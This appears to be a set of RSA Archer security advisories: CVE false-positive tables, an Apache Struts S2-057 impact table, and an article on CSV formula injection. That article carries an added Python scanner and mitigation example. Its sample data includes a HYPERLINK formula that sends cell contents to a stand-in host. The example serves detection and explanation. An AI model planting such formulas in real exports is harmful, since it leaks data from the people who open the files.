Articles

Article Number 000037069

CVE ID: The CVE IDs are listed in the table below.

Applies To
RSA Product Set: Archer
RSA Product/Service Type: Archer
RSA Version/Condition: 6.5.0

Article Summary
CVE ID: The Common Vulnerabilities and Exposures Identifiers (CVE IDs) are listed in the table below.
Issue Summary: This article provides a list of security vulnerabilities that cannot be exploited on Dell EMC RSA Archer 6.5.0, but which may be flagged by security scanners.
Link to Advisories: Each CVE ID listed can be searched at https://web.nvd.nist.gov/view/vuln/search. Once there, search for each CVE ID referenced in this article for more details.
Impact Details: The vulnerabilities in the table below are ordered by the date on which RSA Archer Engineering determined that RSA Archer 6.5.0 was not vulnerable.

CVE ID | Summary of Vulnerability | Reason Product is Not Vulnerable | Date Determined False Positive
CVE-2012-6708 (duplicate: CVE-2017-16011) | jQuery 1.4.1 and 1.4rc1 are vulnerable to cross-site scripting (XSS) because of the way jQuery determines whether input is HTML code. | The reported association to jQuery is invalid. | October 1, 2018
CVE-2018-8046 | The ExtJS subcomponent getTip() is vulnerable to cross-site scripting (XSS) even when passed HTML-escaped data. | Archer prevents XSS attacks by sanitizing the input. Not exploitable. | October 4, 2018
CVE-2013-2035 | The HawtJNI subcomponent before 1.8 is vulnerable to a race condition when a custom library path is not specified. | GemFire caching does not leverage the vulnerable component. | October 15, 2018
CVE-2018-12536 | Jetty through 9.4.x is prone to a timing channel in util/security/Password.java. | GemFire is not vulnerable to this CVE, as static files are not served in the area of the vulnerability. | October 15, 2018

Link to Advisories: https://web.nvd.nist.gov/view/vuln/search
Alert Impact: Not Exploitable

Disclaimer
Read and use the information in this RSA Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact RSA Software Technical Support at 1-800-995-5095. RSA Security LLC and its affiliates, including without limitation its ultimate parent company, Dell EMC, distribute RSA Security Advisories in order to bring important security information to the attention of users of the affected RSA products. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided 'as is' without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA, its affiliates or suppliers be liable for any damages whatsoever, including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA, its affiliates or suppliers have been advised of the possibility of such damages. Some jurisdictions do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.
Article Number 000036587

CVE ID: CVE-2017-1000048, CVE-2018-1270, CVE-2018-1271, CVE-2018-1272, CVE-2018-1273, CVE-2018-1274, CVE-2015-9251

Applies To
RSA Product Set: Archer
RSA Product/Service Type: Archer
RSA Version/Condition: 6.4 SP1

Article Summary
CVE ID: The Common Vulnerabilities and Exposures Identifiers (CVE IDs) are listed in the table below.
Issue Summary: This article provides a list of security vulnerabilities that cannot be exploited on Dell EMC RSA Archer 6.4 SP1, but which may be flagged by security scanners.
Link to Advisories: Each CVE ID listed can be searched at https://web.nvd.nist.gov/view/vuln/search. Once there, search for each CVE ID referenced in this article for more details.
Impact Details: The vulnerabilities in the table below are ordered by the date on which RSA Archer Engineering determined that RSA Archer 6.4 SP1 was not vulnerable.

CVE ID | Summary of Vulnerability | Reason Product is Not Vulnerable | Date Determined False Positive
CVE-2017-1000048 | ljharb's qs module older than v6.3.2, v6.2.3, v6.1.2 and v6.0.4 is vulnerable to denial of service (DoS). | The component version used is higher than the impacted versions. | June 13, 2018
CVE-2018-1270 | Spring Framework is vulnerable to remote code execution (RCE) due to a lack of proper validation of user-supplied input. | GemFire caching does not leverage the vulnerable component. | June 13, 2018
CVE-2018-1271 | Spring Framework is vulnerable to directory traversal due to the way static content can be loaded. | GemFire does not serve files from the file system. | June 19, 2018
CVE-2018-1272 | Spring Framework is vulnerable to privilege escalation due to insufficient validation of user-supplied input. | GemFire caching does not leverage the vulnerable component. | June 17, 2018
CVE-2018-1273 | Spring Data Commons contains a property binder vulnerability caused by improper neutralization of special elements. | GemFire is not shipped with the vulnerable component. | June 29, 2018
CVE-2018-1274 | Spring Data Commons is vulnerable to denial of service (DoS) because it does not check for lengthy path names. | GemFire is not shipped with the vulnerable component. | June 29, 2018
CVE-2015-9251 | The jQuery library is vulnerable to cross-site scripting (XSS) caused by a lack of user input sanitization. | The local help system is not leveraged by the web server component involving user sessions and user input. | July 5, 2018

Link to Advisories: https://web.nvd.nist.gov/view/vuln/search
Alert Impact: Not Exploitable

Disclaimer: see the disclaimer under Article Number 000037069 above; the same terms apply to this advisory.
Article Number 000036658

CVE ID: CVE-2018-11776 (Apache Struts advisory S2-057)

Article Summary
On August 22, 2018, the Apache Software Foundation disclosed a vulnerability in Apache Struts 2 that could allow an attacker to execute arbitrary commands remotely on affected systems. For more information on this vulnerability, review the Apache security advisory (S2-057).

Link to Advisories
Apache: https://cwiki.apache.org/confluence/display/WW/S2-057

Resolution
RSA is aware of and investigating the impact of this vulnerability on our products. The following table contains the latest available impact information and will be updated as additional information becomes available.

RSA Product Name | Versions | Impact Status | Details | Last Updated
RSA 3D Secure/Adaptive Authentication eCommerce | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA Access Manager | 6.2, 6.2.1, 6.2.2, 6.2.3, 6.2.4 | Not Impacted | Product uses Apache Struts but is not impacted by this issue. | 2018-08-30
RSA Adaptive Authentication Cloud | All Supported | Not Impacted | | 2018-08-24
RSA Adaptive Authentication Hosted | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-28
RSA Adaptive Authentication On-Prem | 7.x | Not Impacted | Product does not use the impacted version of Apache Struts. | 2018-08-28
RSA Archer Hosted | N/A | Not Impacted | | 2018-08-24
RSA Archer Platform | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA Archer Security Operations Management (SecOps) | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA Archer Vulnerability & Risk Manager (VRM) | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA Authentication Client (RAC) | All Supported | Investigating | | 2018-08-24
RSA Authentication Manager | All Supported | Not Impacted | | 2018-08-24
RSA Authentication Manager Web Tier | All Supported | Not Impacted | | 2018-08-27
RSA BSAFE C Products: MES, Crypto-C ME, SSL-C | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA BSAFE Java Products: Cert-J, Crypto-J, SSL-J | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA Central | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-10-25
RSA Data Loss Prevention | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA Data Protection Manager | All Supported | Not Impacted | | 2018-08-31
RSA DCS: RSA Certificate Manager | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA DCS: RSA Validation Manager | All Supported | Not Impacted | Product does not use the impacted version of Apache Struts. | 2018-08-27
RSA eFraudNetwork (eFN) | All Supported | Not Impacted | | 2018-08-24
RSA Federated Identity Manager | All Supported | Not Impacted | Product does not use the impacted version of Apache Struts. | 2018-08-27
RSA FraudAction (OTMS) | All Supported | Not Impacted | | 2018-08-24
RSA Identity Governance and Lifecycle Software (RSA Via Lifecycle and Governance Software, RSA Identity Management & Governance Software) | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA Identity Governance and Lifecycle Appliance (RSA Via Lifecycle and Governance Appliance, RSA Identity Management & Governance Appliance) | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA Identity Governance and Lifecycle SaaS / MyAccessLive (RSA Via Lifecycle and Governance SaaS / MyAccessLive) | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA Identity Governance and Lifecycle Virtual Application | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-29
RSA NetWitness Endpoint (ECAT) | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA NetWitness Logs & Packets / Security Analytics (Hardware and Virtual Appliances) | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA NetWitness Live Infrastructure | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
RSA SecurID Access Cloud Service | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Access IDR VM | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Agent for PAM | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Agent for Web | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Agent for Windows | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Authenticate App for Android | All Supported | Investigating | | 2018-08-24
RSA SecurID Authenticate App for iOS | All Supported | Investigating | | 2018-08-24
RSA SecurID Authenticate App for Windows 10 | All Supported | Investigating | | 2018-08-24
RSA SecurID Authentication Engine | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Authentication SDK | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Software Token Converter | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Software Token for Android | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Software Token for Blackberry | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Software Token for Desktop | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Software Token for iPhone | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Software Token for Windows Mobile | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Software Token Toolbar | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Software Token Web SDK | All Supported | Not Impacted | | 2018-08-24
RSA SecurID Transaction Signing SDK | All Supported | Not Impacted | | 2018-08-24
RSA SYN | Current Hosted Environment | Not Impacted | Product does not use Apache Struts. | 2018-11-01
RSA Web Threat Detection | All Supported | Not Impacted | Product does not use Apache Struts. | 2018-08-24
Article Number 000036742

Applies To
RSA Product Set: RSA Archer
RSA Version/Condition: 6.1.x and later

Article Summary
The RSA Archer team occasionally receives reports, from customers performing penetration tests, of an injection vulnerability: the RSA Archer application allows formula characters to be stored in the system and later exported directly to a comma-separated values (CSV) file. When the CSV file is opened in a spreadsheet application such as Microsoft Excel or LibreOffice Calc, the formula is executed, which can lead to arbitrary program execution on the user's system and exfiltration of file contents, system information and so on.

CSV is an interchange format defined in RFC 4180 from the Internet Engineering Task Force (IETF). It is typically used for exchanging data between two applications. The vulnerability reports describe an attack scenario in which, under certain circumstances, the exported formulas are executed by the spreadsheet application that opens the CSV file. Spreadsheet applications warn users about potential command execution when they open such a file (for example, Microsoft Excel shows "Do not enable this content unless you trust the source of the file"), but users may trust the source because the file came from an internal application.

Resolution
The RSA Archer team has assessed this vulnerability report and determined that it is not a vulnerability in our product but a side effect of the CSV format. We believe this issue should be mitigated by the application that interprets the user-exported CSV file rather than by the application that creates it. The penetration test reports are often accompanied by suggested resolutions that escape or remove the formula trigger characters. Those changes, however, modify data in RSA Archer, which can result in hard-to-debug issues such as duplicate records or unexpected version/audit updates when such CSV files are later imported.

At this time, our analysis has concluded that the negative side effects of a change to RSA Archer for this issue do not benefit the majority of our customers. RSA Archer will update this article if new information becomes available. RSA Archer customers are recommended to follow the security best practices documented at https://community.rsa.com/docs/DOC-94422
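The export-and-reimport behaviour described in this article, as an added example that is not part of the original article and is not RSA Archer code. It shows the three things a practitioner wants to see: the scanner-style check a penetration tester runs over an export to flag cells a spreadsheet could evaluate, the usual suggested mitigation (prefixing a trigger cell with a single quote and quoting every field), and a round-trip check that makes the article's objection concrete: the neutralized value no longer matches the stored value, so a later import would not match the original record. The sample rows, column names and the https://example.invalid URL are constructed for the example; nothing here depends on Archer.

```python
import csv
import io

# Leading characters that Excel and LibreOffice Calc may evaluate as a formula.
# '+' and '-' are treated conservatively: "-5% variance" is ordinary text, but
# "-1+1" is arithmetic, and a character filter cannot tell them apart.
FORMULA_TRIGGERS = ("=", "+", "-", "@")
# A leading tab or carriage return can also start a formula in some importers.
CONTROL_TRIGGERS = ("\t", "\r")

# Constructed sample of an export (not real Archer data). Row 2 carries a
# formula that would open an attacker-chosen URL with cell A1 appended to the
# query string; row 3 is a legitimate value and row 4 a formula-looking value,
# both beginning with a trigger character.
SAMPLE_ROWS = [
    ["Record ID", "Title", "Owner"],
    ["1001", "Quarterly review", "alice"],
    ["1002", '=HYPERLINK("https://example.invalid/?c="&A1,"Open")', "bob"],
    ["1003", "-5% variance", "carol"],
    ["1004", "@SUM(A1:A3)", "dave"],
]


def is_formula_trigger(cell):
    """True if a spreadsheet may interpret this cell as a formula."""
    return bool(cell) and (cell[0] in FORMULA_TRIGGERS or cell[0] in CONTROL_TRIGGERS)


def raw_export(rows):
    """Export the way the article describes: values written exactly as stored."""
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerows(rows)
    return buf.getvalue()


def find_injection_cells(csv_text):
    """Scanner-style check: (row, column, value) for every cell a spreadsheet
    could evaluate. This is what a penetration test report lists."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_trigger(cell):
                findings.append((r, c, cell))
    return findings


def neutralize_cell(cell):
    """The mitigation pentest reports usually suggest: prefix a trigger cell
    with a single quote so the spreadsheet treats it as text. The quote
    becomes part of the exported value."""
    return "'" + cell if is_formula_trigger(cell) else cell


def safe_export(rows):
    """Export with neutralization applied and every field quoted, so a
    delimiter inside a value cannot split a cell."""
    buf = io.StringIO()
    w = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    w.writerows([neutralize_cell(c) for c in row] for row in rows)
    return buf.getvalue()


def roundtrip_changes(rows):
    """Cells whose value differs after safe_export() and re-import. A non-empty
    result is the data modification the article objects to: the re-imported
    value no longer equals the stored one, so an import would record a new
    version or a duplicate instead of matching the original record."""
    back = list(csv.reader(io.StringIO(safe_export(rows))))
    changes = []
    for r, (before, after) in enumerate(zip(rows, back)):
        for c, (a, b) in enumerate(zip(before, after)):
            if a != b:
                changes.append((r, c, a, b))
    return changes


if __name__ == "__main__":
    for r, c, value in find_injection_cells(raw_export(SAMPLE_ROWS)):
        print(f"flagged row {r} col {c}: {value!r}")
    for r, c, a, b in roundtrip_changes(SAMPLE_ROWS):
        print(f"changed row {r} col {c}: stored {a!r} -> re-imported {b!r}")
```

Running it flags the HYPERLINK cell, but also the legitimate "-5% variance" value, and the round-trip check shows all three flagged values coming back with a leading apostrophe. That is the trade-off the article describes: a server-side filter either alters stored data on every export, including harmless values, or leaves the decision to the spreadsheet that opens the file.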
Article Number 000039766

CVE ID: The CVE IDs are listed in the table below.

Link to Advisories
Each CVE ID listed can be searched at https://web.nvd.nist.gov/view/vuln/search. Once there, search for each CVE ID referenced in this article for more details.

Alert Impact Explanation
The vulnerabilities in the table below are ordered by the date on which RSA Archer Engineering determined that the RSA Archer [Product Version] was not vulnerable.

Embedded Component | CVE ID | Summary of Vulnerability | Reason Product is Not Vulnerable | Date Determined False Positive
ARCHER-106818 | CVE-2020-28488 | jQueryUI is vulnerable to CVE-2020-28488. | This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. | February 15, 2021
ARCHER-99300 | N/A | Highcharts versions prior to 7.2.2 or 8.1.1 are vulnerable to cross-site scripting (XSS) due to insufficient sanitization of user-supplied data. This could allow a remote attacker to inject arbitrary JavaScript and obtain sensitive information such as authentication tokens and user session cookies. Note: this issue only affects Highcharts if it is set up to accept unfiltered input from end users in the option configuration. | The vulnerability is only applicable if the product accepts unfiltered input from end users in the option configuration. Based on engineering investigation we do not, so this issue is a false positive for the Archer platform. | October 27, 2020
ARCHER-112994 | CVE-2020-11023, CVE-2020-11022, CVE-2019-11358, CVE-2015-9251 | Archer is using version 1.12.4 of jQuery. | Telerik, a third-party component of Archer, runs jQuery 1.12.4 because of a code incompatibility with versions above 3.5, but has patched the known vulnerabilities from versions prior to 3.5.1 into its build of 1.12.4; therefore, reports that Archer uses a vulnerable jQuery 1.12.4 are false positives. | May 17, 2021

Disclaimer: see the disclaimer under Article Number 000037069 above; the same terms apply to this advisory.